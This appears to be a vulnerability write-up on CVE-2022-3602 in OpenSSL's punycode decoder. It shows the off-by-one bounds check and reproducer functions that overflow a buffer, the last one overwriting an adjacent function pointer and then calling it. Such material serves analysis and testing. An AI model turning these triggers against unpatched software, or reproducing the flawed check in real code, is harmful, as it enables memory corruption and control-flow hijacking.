CVE-2022-3602

具体内容
crypto/punycode.c

/*
 * Fragment of the OpenSSL punycode decoder (crypto/punycode.c) as it stood
 * before the fix for CVE-2022-3602.  Only the insertion step of the decode
 * loop is shown; the elided parts are marked with "....".
 *
 * pDecoded    : caller-supplied output array of code points
 * pout_length : on entry, the number of elements pDecoded can hold
 *               (copied into max_out); presumably updated on return with
 *               the element count, but that part is not shown here
 * written_out : number of elements currently stored in pDecoded
 *               (incremented once per inserted code point below)
 * i           : insertion position for the next code point n
 */
int ossl_punycode_decode(const char *pEncoded, const size_t enc_len,
unsigned int *pDecoded, unsigned int *pout_length){
unsigned int max_out = *pout_length;
..................
for(...){
....................
/*
 * Off-by-one: valid indices are 0..max_out-1, but this check still admits
 * written_out == max_out.  The memmove below then writes element index
 * written_out, i.e. pDecoded[max_out], which is one element
 * (sizeof *pDecoded bytes) past the end of the caller's buffer.
 * The corrected guard is `if (written_out >= max_out)`.
 */
if (written_out > max_out)
return 0;

/*
written_out=7 i=4 sizeof *pDecoded=sizeof(int)=4
memmove(pDecoded + 1 + 4 , pDecoded + 4, (7-4)*sizeof(int))
memmove(pDecoded + 5, pDecoded + 4, 3*sizeof(int))
=> writes pDecoded[5..7]; with max_out == 7, pDecoded[7] is out of bounds
*/
/* Shift elements i..written_out-1 up by one to open a slot at index i.
 * The highest index touched is written_out, so this is only in bounds
 * while written_out < max_out. */
memmove(pDecoded + i + 1, pDecoded + i, (written_out - i) * sizeof *pDecoded);
pDecoded[i] = n;
i++;
written_out++;
}
.................
}
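/*
 * Reproducer for the punycode decoder overrun (CVE-2022-3602).
 *
 * The input decodes to 8 code points, but the caller advertises room for
 * only 7 (bsize = 7).  A correct decoder must reject the input; a
 * vulnerable one writes the 8th value (0x751F) one element past the
 * advertised length.  buf is deliberately declared with 8 elements so
 * that the overrun lands in buf[7] instead of unrelated stack data, which
 * makes the overwrite observable by comparing buf against out[].
 *
 * Returns 1 when the decoder rejects the oversized output (expected),
 * 0 when the decoder reports success, i.e. when the overrun is reachable.
 */
static int test_puny1(void)
{
    static const unsigned int out[8] = {
        0x0033, 0x5E74, 0x0042, 0x7D44, 0x91D1, 0x516B, 0x5148, /* expected 7 */
        0x751F /* the value written past the 7-element limit */
    };
    static const char *in = "3B-ww4c5e180e575a65lsy2b";
    unsigned int buf[8];
    unsigned int bsize = 7;
    const size_t nbuf = sizeof buf / sizeof buf[0];

    int result = ossl_punycode_decode(in, strlen(in), buf, &bsize);

    /* bsize is unsigned int: %u, not %d.  Observed 8 on a vulnerable
     * build, 7 expected. */
    printf("bsize: %u\n", bsize);
    /* Cap the dump at the real size of buf so a decoder that reports an
     * even larger bsize cannot make this loop read past buf itself. */
    for (size_t i = 0; i < bsize && i < nbuf; i++) {
        printf("%x ", buf[i]);
    }
    printf("\n");

    if (result != 0) {
        /* Success with bsize == 8 means buf[7] was written; matching
         * out[] in full confirms the 8th element is 0x751F. */
        if (bsize <= nbuf
            && test_mem_eq(buf, bsize * sizeof(*buf), out, sizeof(out))) {
            printf("CRITICAL: buffer overrun detected!\n");
        }
        return 0;
    }
    return 1;
}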
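/*
 * Minimal trigger for the same overrun: a 7-element destination for an
 * input that decodes to 8 code points, with nothing placed after the
 * buffer on purpose.  On a vulnerable decoder the 8th write lands in
 * whatever happens to follow out[] on the stack, so this variant cannot
 * detect the corruption by itself; it is only informative when run under
 * an external memory checker.
 *
 * Always returns 1.  The decoder's result and the returned length are
 * printed so they are not silently discarded.
 */
static int test_puny2(void)
{
    /* A string literal is not writable, so the pointer is const. */
    static const char *in = "3B-ww4c5e180e575a65lsy2b";
    unsigned int out[7] = {0}; /* 7 unsigned ints (28 bytes), not 7 bytes */
    unsigned int bsize = 7;

    int result = ossl_punycode_decode(in, strlen(in), out, &bsize);

    /* Expected on a fixed decoder: result == 0 with bsize unchanged.
     * result != 0 together with bsize == 8 means the guard let the
     * 8th element through. */
    printf("test_puny2: result=%d bsize=%u\n", result, bsize);

    return 1;
}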
static int test_puny3(void)
{
typedef int (*EmbeddedFunc)(void);

struct example {
int decoded[7];
EmbeddedFunc ofc;
};
static const unsigned int out[] = {
0x0033, 0x5E74, 0x0042, 0x7D44, 0x91D1, 0x516B, 0x5148, 0x751F
};
static const char* in = "3B-ww4c5e180e575a65lsy2b";
struct example ex;
unsigned int bsize = OSSL_NELEM(ex.decoded);

ex.ofc = (EmbeddedFunc) &puts;

int result = ossl_punycode_decode(in, strlen(in), ex.decoded, &bsize);
ex.ofc();

return 1;
}
2023-05-06
